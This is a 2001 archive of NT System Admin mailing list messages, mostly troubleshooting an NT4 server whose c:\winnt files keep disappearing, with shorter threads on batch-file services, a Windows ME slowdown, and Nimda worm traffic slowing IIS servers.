RE: Files keep disappearing from the winnt dir
Title: Message That's a good one but there aren't any dlls in our winnt directory. -Original Message-From: klimo [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 3:52 AMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir I have been told ( it could be a rumor ), that there is a virus, which is "hungry" for .dll's! Maybe this is true! - Original Message - From: Mark Pilbeam To: NT System Admin Issues Sent: Friday, September 28, 2001 9:22 AM Subject: RE: Files keep disappearing from the winnt dir Hi, Intrigued, and I thought it was just me. Recently I spoke to an admin who was telling me the same thing. He lost all his printers, and then some of his.dll's went missing too. No idea what is going on, but his PDC is grinding away like a concrete making machine. Is it possible that the mft is corrupted, possibly caused by wear andtear, (the server hasn't been reimaged or re-installed for over 5 years.) From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 11:49 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir I have been running this system for about5 years, been in the business for about 17 years. What I am saying is that the files are gone. Vanished. Not there. Thyey are missing. If I try to run explorer from the start menu, nothing happens. So, I go to start run and run the explorer.exe which I have stored away in a seperate directory in case it vanishes from the winnt dir. I am just asking if anyone has had the occasion of, maybe a corrupt system, and has experienced this before? I don't think any other files are missing, could be but I know the ones in the winnt are missing. I can copy them in there, see them, run them, and 30 minutes later they are not there. Take my statement literally...the files are gone, caput, vanished, not visible and all other meanings of "not there" etc. :))) John -Original Message-From: Chris Shattock [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 6:29 PMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir I have to ask too: When you say the files are missing - and yet you can run explorer from CMD - are you saying you can't see them in Explorer or can't you see them from cmd prompt. Or - even better - if you boot from floppyto cmd prompt are they there then? Is it FAT or NTFS partition? Are other files 'missing' in other directories? - Original Message - From: John Cesta - Lists To: NT System Admin Issues Sent: Thursday, September 27, 2001 11:58 PM Subject: RE: Files keep disappearing from the winnt dir I am the admin. I can login ok, but I can't run the explorer. I have to do a start run explorer. I've placed it in a different area. Remember, only the "files" are missing in the winnt dir. There is not much in there that you need to login. John -Original Message-From: Flanagan, Kevin [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 3:57 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir I have to ask, how is it that you are able to log in if all of the files in the winnt directory are gone? Are you sure that you can't see them but they are there? +---+ Kevin Flanagan C/S Planning Engineer III I/T Implementation Department Branch Banking Trust Company 3261 Atlantic Avenue, Suite 116 MC: 172-85-01-00 Raleigh, NC 27604 Voice: 919-716-6209 -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 1:10 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir No, actually, I haven't. that server is not involved inany email clientsor not usedby anyone. It is a backup server tied to one other server. That's it.
RE: Files keep disappearing from the winnt dir
Title: Message That's kind of what Iwas thinking. THe files system is corrupt. The server is still working fine -Original Message-From: Mark Pilbeam [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 2:22 AMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir Hi, Intrigued, and I thought it was just me. Recently I spoke to an admin who was telling me the same thing. He lost all his printers, and then some of his.dll's went missing too. No idea what is going on, but his PDC is grinding away like a concrete making machine. Is it possible that the mft is corrupted, possibly caused by wear andtear, (the server hasn't been reimaged or re-installed for over 5 years.) From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 11:49 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir I have been running this system for about5 years, been in the business for about 17 years. What I am saying is that the files are gone. Vanished. Not there. Thyey are missing. If I try to run explorer from the start menu, nothing happens. So, I go to start run and run the explorer.exe which I have stored away in a seperate directory in case it vanishes from the winnt dir. I am just asking if anyone has had the occasion of, maybe a corrupt system, and has experienced this before? I don't think any other files are missing, could be but I know the ones in the winnt are missing. I can copy them in there, see them, run them, and 30 minutes later they are not there. Take my statement literally...the files are gone, caput, vanished, not visible and all other meanings of "not there" etc. :))) John -Original Message-From: Chris Shattock [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 6:29 PMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir I have to ask too: When you say the files are missing - and yet you can run explorer from CMD - are you saying you can't see them in Explorer or can't you see them from cmd prompt. Or - even better - if you boot from floppyto cmd prompt are they there then? Is it FAT or NTFS partition? Are other files 'missing' in other directories? - Original Message - From: John Cesta - Lists To: NT System Admin Issues Sent: Thursday, September 27, 2001 11:58 PM Subject: RE: Files keep disappearing from the winnt dir I am the admin. I can login ok, but I can't run the explorer. I have to do a start run explorer. I've placed it in a different area. Remember, only the "files" are missing in the winnt dir. There is not much in there that you need to login. John -Original Message-From: Flanagan, Kevin [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 3:57 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir I have to ask, how is it that you are able to log in if all of the files in the winnt directory are gone? Are you sure that you can't see them but they are there? +---+ Kevin Flanagan C/S Planning Engineer III I/T Implementation Department Branch Banking Trust Company 3261 Atlantic Avenue, Suite 116 MC: 172-85-01-00 Raleigh, NC 27604 Voice: 919-716-6209 -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 1:10 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir No, actually, I haven't. that server is not involved inany email clientsor not usedby anyone. It is a backup server tied to one other server. That's it. John -Original Message-From: Martin Blackstone [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:00 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir Just for the halibut, have you run a full AV scan on this server? -Original Message-----From
RE: Files keep disappearing from the winnt dir
Title: Message -Original Message-From: Miley, Dan [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 9:01 AMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir You say I KNOW that the server does not have any viruses have you booted to known good media and done a virus scan? Yes, that's why I made that statement. :) John -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Subject: RE: Files keep disappearing from the winnt dir No, actually, I haven't. that server is not involved inany email clientsor not usedby anyone. It is a backup server tied to one other server. That's it. John -Original Message-From: Martin Blackstone [mailto:[EMAIL PROTECTED]]Subject: RE: Files keep disappearing from the winnt dir Just for the halibut, have you run a full AV scan on this server? -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 8:07 AMTo: NT System Admin IssuesSubject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John Cesta Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ This e-mail may be privileged and/or confidential, and the sender does not waive any related rights and obligations. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. If you received this e-mail in error, please advise me (by return e-mail or otherwise) immediately. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Files keep disappearing from the winnt dir
Our server is not running the dir replicator. Imagine this... You load explorer, navigate to the c:\winnt directory and list it. You see all the directories and the files. Mostly the files are some ini and txt files along with some exes that you may or may not use. Anyway, you see them all in there. You close explorer and go get a cup of coffee. You return, load explorer, navigate to the c:\winnt dir again the files are gone except for two exes. IN our case it is the named.exe and another I forgot. Keep in mind, now, you are the only one who can access this computer since it is locked in a cage in a very protected datacenter, trust me, you are the only one that has access. This is what is happening. There is no dir replication service running or any other funky software or scheduled maintenance or appsnothing. The only thing I can think of is that the file system is corrupt and the files just get eaten up. I then copy them back into the winnt dir ( I have them stored on another part of the hard disk since they keep vanishing) and it happens again. John -Original Message- From: Wong, Joe [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 12:31 PM To: NT System Admin Issues Subject: RE: Files keep disappearing from the winnt dir Is the server running the Directory Replicator service? ... Joe -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 11:12 AM To: NT System Admin Issues Subject: RE: Files keep disappearing from the winnt dir AT service isn't running. No hands ever touch that server, it's in a locked cabinet only accessible by me, my access code, palm print and badge.. John -Original Message- From: Brian Steele [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 12:44 PM To: NT System Admin Issues Subject: Re: Files keep disappearing from the winnt dir WAG: Is the Task Scheduler running? Check to see if anyone's set anything nasty to run. Brian - Original Message - From: John Cesta - mailto:[EMAIL PROTECTED] Lists To: NT System Admin mailto:[EMAIL PROTECTED] Issues Sent: Friday, September 28, 2001 11:07 AM Subject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - not any directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John Cesta Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ This email communication is intended as a private communication for the sole use of the primary addressee and those individuals listed for copies in the original message. The information contained in this email is private and confidential and if you are not an intended recipient you are hereby notified that copying, forwarding or other dissemination or distribution of this communication by any means is prohibited. If you are not specifically authorized to receive this email and if you believe that you received it in error please notify the original sender immediately. We honour similar requests relating to the privacy of email communications. Cette communication par courrier électronique est une communication privée à l'usage exclusif du destinataire principal ainsi que des personnes dont les noms figurent en copie. Les renseignements contenus dans ce courriel sont confidentiels et si vous n'êtes pas le destinataire prévu, vous êtes avisé, par les présentes que toute reproduction, tout transfert ou toute autre forme de diffusion de cette communication par quelque moyen que ce soit est interdit. Si vous n'êtes pas spécifiquement autorisé à recevoir ce courriel ou si vous croyez l'avoir reçu par erreur, veuillez en aviser l'expéditeur original immédiatement. Nous respectons les demandes similaires qui touchent la confidentialité des communications par courrier électronique. Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http
RE: Batch file to NT Service
We use FireDaemon at formida.comto create service. Don't know about a batch file though. John Cesta ColdFusion ASP ActiveState PERL HostingIncludes 10 Domains - 100% Browser Based Administrationhttp://www.cybersmarts.netLogFileManager - IIS LogFile Management ToolWebPageChecker - Helps Maintain Server UpTimehttp://www.serverautomationtools.com -Original Message-From: Jolley Lee @Consult [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 10:31 AMTo: NT System Admin IssuesSubject: Batch file to NT Service Does anybody know how I can take a batch file and make it a service. I've heard it is possible to make an executable into a service with some registry chnges but I don't know anymore than that. Any help would be appreciated. TIA Lee **This email transmission is confidential and intended for theaddressee only. It may contain privileged and confidentialinformation. If you are not the person or organisation towhom it is addressed, you must not copy, distribute, or takeany action in reliance upon it. If you have received thismessage in error, please notify the[EMAIL PROTECTED] and return it.Carillion PLC Registered in England No. 3782379Registered Office:Birch Street Wolverhampton WV1 4HY**Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/_This message has been checked for all known viruses by Star Internetdelivered through the MessageLabs Virus Scanning Service. For furtherinformation visit http://www.star.net.uk/stats.asp or alternatively callStar Internet for details on the Virus Scanning Service.Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
Files keep disappearing from the winnt dir
Title: Out of Buffer Error I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John Cesta ColdFusion ASP ActiveState PERL HostingIncludes 10 Domains - 100% Browser Based Administrationhttp://www.cybersmarts.netLogFileManager - IIS LogFile Management ToolWebPageChecker - Helps Maintain Server UpTimehttp://www.serverautomationtools.com -Original Message-From: Jason Dwyer [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:18 AMTo: NT System Admin IssuesSubject: Out of Buffer Error Hi there guys, I am new to the list and have been lurking the last few days, I must say there is a lot of knowledge that flows through here, I would like to try and tap some. I am running an NT4 server with SP6a, using a product called Wingate('cos I don't know how to use Proxy) as a web sharing proxy box. Occasionally I get this Out of Buffers errror. I have searched the wingate kb and MS but am struggling to find a solution. Any ideas? Regards, Jason Dwyer Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Files keep disappearing from the winnt dir
Title: Out of Buffer Error AT service isn't running. No hands ever touch that server, it's in a locked cabinet only accessible by me, my access code, palm print and badge.. John -Original Message-From: Brian Steele [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:44 PMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir WAG: Is the Task Scheduler running? Check to see if anyone's set anything nasty to run. Brian - Original Message - From: John Cesta - Lists To: NT System Admin Issues Sent: Friday, September 28, 2001 11:07 AM Subject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John CestaWant to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Files keep disappearing from the winnt dir
Title: Out of Buffer Error I just ran an AV on the server. No virus. John -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:12 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir AT service isn't running. No hands ever touch that server, it's in a locked cabinet only accessible by me, my access code, palm print and badge.. John -Original Message-From: Brian Steele [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:44 PMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir WAG: Is the Task Scheduler running? Check to see if anyone's set anything nasty to run. Brian - Original Message - From: John Cesta - Lists To: NT System Admin Issues Sent: Friday, September 28, 2001 11:07 AM Subject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John CestaWant to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Files keep disappearing from the winnt dir
Title: Message No, actually, I haven't. that server is not involved inany email clientsor not usedby anyone. It is a backup server tied to one other server. That's it. John -Original Message-From: Martin Blackstone [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:00 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir Just for the halibut, have you run a full AV scan on this server? -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, September 28, 2001 8:07 AMTo: NT System Admin IssuesSubject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John Cesta ColdFusion ASP ActiveState PERL HostingIncludes 10 Domains - 100% Browser Based Administrationhttp://www.cybersmarts.netLogFileManager - IIS LogFile Management ToolWebPageChecker - Helps Maintain Server UpTimehttp://www.serverautomationtools.com -Original Message-From: Jason Dwyer [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:18 AMTo: NT System Admin IssuesSubject: Out of Buffer Error Hi there guys, I am new to the list and have been lurking the last few days, I must say there is a lot of knowledge that flows through here, I would like to try and tap some. I am running an NT4 server with SP6a, using a product called Wingate('cos I don't know how to use Proxy) as a web sharing proxy box. Occasionally I get this Out of Buffers errror. I have searched the wingate kb and MS but am struggling to find a solution. Any ideas? Regards, Jason Dwyer Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Files keep disappearing from the winnt dir
Title: Out of Buffer Error Nothing in the event logs. I thinik I will turn on auditing. Today the files were gone in a matter or 1 hour after I copied them in the directory. John -Original Message-From: Ian Kelly [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 2:59 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir Anything in the event logs? Is auditing turned on? Ian-[EMAIL PROTECTED]-To assume makes an ass out of YOU. Leave ME out of this. -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: September 28, 2001 13:40 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir I just ran an AV on the server. No virus. John -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Friday, September 28, 2001 1:12 PMTo: NT System Admin IssuesSubject: RE: Files keep disappearing from the winnt dir AT service isn't running. No hands ever touch that server, it's in a locked cabinet only accessible by me, my access code, palm print and badge.. John -Original Message-From: Brian Steele [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 27, 2001 12:44 PMTo: NT System Admin IssuesSubject: Re: Files keep disappearing from the winnt dir WAG: Is the Task Scheduler running? Check to see if anyone's set anything nasty to run. Brian - Original Message - From: John Cesta - Lists To: NT System Admin Issues Sent: Friday, September 28, 2001 11:07 AM Subject: Files keep disappearing from the winnt dir I am having a sort of weird problem on one of my NT4.0 SP6a servers. A while back I had to clean the server - chkdsk - seemed to work ok. After that this problem keeps occurring. One day I noticed that the files - notany directories just files - in the c:\winnt directory were gone except for two of them. I copied the files from another identical NT box in to this server's winnt directory. A day or so later they were gone again. I copied them into the dir again, a day later they are gone. I KNOW that the server does not have any viruses. I can only figure that the server may have a corrupt file system and needs to be cleaned once more. Any suggestions? John Cesta Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Nimbda is back???
I am sure Nimda will be around for a long, long time. John -Original Message- From: Marco Martinez [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 27, 2001 8:54 PM To: NT System Admin Issues Subject: Nimbda is back??? Folks, Nimbda is coming back! http://www.infoworld.com/articles/hn/xml/01/09/27/010927hnnimbda.x ml?0927ale rt - Marco A. Martinez Computing Services Coordinator (ITCC) / Microsoft Certified Professional College of Education, California State University, Sacramento. Phone: 916/278.5513 Fax: 916/278.5904 Opinions expressed herein, are solely those of Marco Martinez, and not those of California State University, Sacramento. - Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
OT on Windows ME
I have been a member of this list for about a month. We are a small company and I don't have the benefit of a large IT dept so I thought I'd throw this question to you guys. My personal PC is a Windows ME PC. Today it started doing something really weird. About every two hours it just kind of stops. I mean, it still works and all ( although there is no more Internet access) but it is very, very slow. Can't hardly move the mouse and I have to shutdown too get it back. It's weird because it goes south almost like clock work every 1.5 to 2 hours. I don't have a virus, I am fairly certain of that. It actually happens all of a sudden, yea, I sat here and waited for it to happen. It doesn't seem to be a gradual thing, I mean, it doesn't get progressively slow, it happens all at once all of a sudden. It is a royal PITA. Any ideas? : Thanks, John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: IIS Slow Down Due to Nimda?
Title: IIS Slow Down Due to Nimda? Any one seen there IIS Server slow down due to the bug? Is there anyway to stop the request(cmd.exe) from even being made to you box? Here's is what my logs look like. Sunday was a little slow but on an average day we get around ~700 unique visitors. Of course IIS is going to slow down due to many requests. Not much of a way to make it stop unless you know where the source is, call them and ask. Otherwise we are all in the same boat. John Cesta -Original Message-From: Jerry Gamblin [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 20, 2001 10:36 AMTo: NT System Admin IssuesSubject: IIS Slow Down Due to Nimda? Any one seen there IIS Server slow down due to the bug? Is there anyway to stop the request(cmd.exe) from even being made to you box? Here's is what my logs look like. Sunday was a little slow but on an average day we get around ~700 unique visitors. Date Hits Successful Hits 09/16/2001 : 372 : 222 09/17/2001 : 3,454 : 1,026 09/18/2001 : 6,224 : 1,046 09/19/2001 : 5,401 : 745 09/20/2001 : 2,193 : 86 Total Hits : 17644 Average Hits : 3528 That's around 14,000 hits alone from this virus. I don't know what its doing to the server, but is there any way to make it stop? Jerry Gamblin Technology Specialist Linn State Technical College One Technology Drive Linn, MO 65051 [EMAIL PROTECTED] www.linnstate.edu 573-897-5240 -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 9:24 AM To: NT System Admin Issues Subject: RE: HELP VIRUS ON NT MACHINE? HEY, not true, not true. We got hit on 3 servers and were able to cleanse manually and never even turned off the servers, nor did it impact our regular production. Murray -Original Message- From: Rocky Stefano [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 9:21 AM To: NT System Admin Issues Subject: RE: HELP VIRUS ON NT MACHINE? For those of you that were unfortunately hit with the latest worm. There is usually no recourse but to wipe the machine clean and reload your software. Trend Antivirus has released a cleaner for the virus. Here is the info. Trend Micro has developed a cleaning tool that will allow you to clean systems infected by PE_NIMDA.A. The cleaning tool and instructions, manual cleaning instructions, and the latest pattern file can be found on our FTP site at: ftp://us-web\[EMAIL PROTECTED] Password: tmcustomer Directory: Premium Customer\tool Files: Cleaning tool: FIX_NIMDA.zip Cleaning tool description and instructions: Readme_nimda.txt Manual cleaning documentation: How to Clean.txt Latest pattern file: ptn_942.zip -Original Message- From: Tiffany Belcher [mailto:[EMAIL PROTECTED]] Sent: September 19, 2001 5:35 PM To: NT System Admin Issues Subject: HELP VIRUS ON NT MACHINE? This thing is on a machine at work and it writes .eml files all over the place in the folders on the hard drive. Is there a way to get rid if this virus? What is it? Uninstalling outlook express or email would that do it? It ran very sluggish and now is frozen up. HELP http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: IIS Slow Down Due to Nimda?
Title: IIS Slow Down Due to Nimda? On my boxes where I have host headers configured and no website is "default", that is, every website demands that a host header be in the request, none of these requests are making it into the logs. I have no idea what that means wrt IIS, maybe it is still processing them and not logging or maybe it just ignores them once a matching host header isn't found. You can bet, it is still banging on you though. John Cesta jbh -Original Message-From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 20, 2001 9:03 AMTo: NT System Admin IssuesSubject: RE: IIS Slow Down Due to Nimda? Any one seen there IIS Server slow down due to the bug? Is there anyway to stop the request(cmd.exe) from even being made to you box? Here's is what my logs look like. Sunday was a little slow but on an average day we get around ~700 unique visitors. Of course IIS is going to slow down due to many requests. Not much of a way to make it stop unless you know where the source is, call them and ask. Otherwise we are all in the same boat. John Cesta -Original Message-From: Jerry Gamblin [mailto:[EMAIL PROTECTED]]Sent: Thursday, September 20, 2001 10:36 AMTo: NT System Admin IssuesSubject: IIS Slow Down Due to Nimda? Any one seen there IIS Server slow down due to the bug? Is there anyway to stop the request(cmd.exe) from even being made to you box? Here's is what my logs look like. Sunday was a little slow but on an average day we get around ~700 unique visitors. Date Hits Successful Hits 09/16/2001 : 372 : 222 09/17/2001 : 3,454 : 1,026 09/18/2001 : 6,224 : 1,046 09/19/2001 : 5,401 : 745 09/20/2001 : 2,193 : 86 Total Hits : 17644 Average Hits : 3528 That's around 14,000 hits alone from this virus. I don't know what its doing to the server, but is there any way to make it stop? Jerry Gamblin Technology Specialist Linn State Technical College One Technology Drive Linn, MO 65051 [EMAIL PROTECTED] www.linnstate.edu 573-897-5240 -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 9:24 AM To: NT System Admin Issues Subject: RE: HELP VIRUS ON NT MACHINE? HEY, not true, not true. We got hit on 3 servers and were able to cleanse manually and never even turned off the servers, nor did it impact our regular production. Murray -Original Message- From: Rocky Stefano [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 9:21 AM To: NT System Admin Issues Subject: RE: HELP VIRUS ON NT MACHINE? For those of you that were unfortunately hit with the latest worm. There is usually no recourse but to wipe the machine clean and reload your software. Trend Antivirus has released a cleaner for the virus. Here is the info. Trend Micro has developed a cleaning tool that will allow you to clean systems infected by PE_NIMDA.A. The cleaning tool and instructions, manual cleaning instructions, and the latest pattern file can be found on our FTP site at: ftp://us-web\[EMAIL PROTECTED] Password: tmcustomer Directory: Premium Customer\tool Files: Cleaning tool: FIX_NIMDA.zip Cleaning tool description and instructions: Readme_nimda.txt Manual cleaning documentation: How to Clean.txt Latest pattern file: ptn_942.zip -Original Message- From: Tiffany Belcher [mailto:[EMAIL PROTECTED]] Sent: September 19, 2001 5:35 PM To: NT System Admin Issues Subject: HELP VIRUS ON NT MACHINE? This thing is on a machine at work and it writes .eml files all over the place in the folders on the hard drive. Is there a way to get rid if this virus? What is it? Uninstalling outlook express or email would that do it? It ran very sluggish and now is frozen up. HELP http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: How do you all do it?
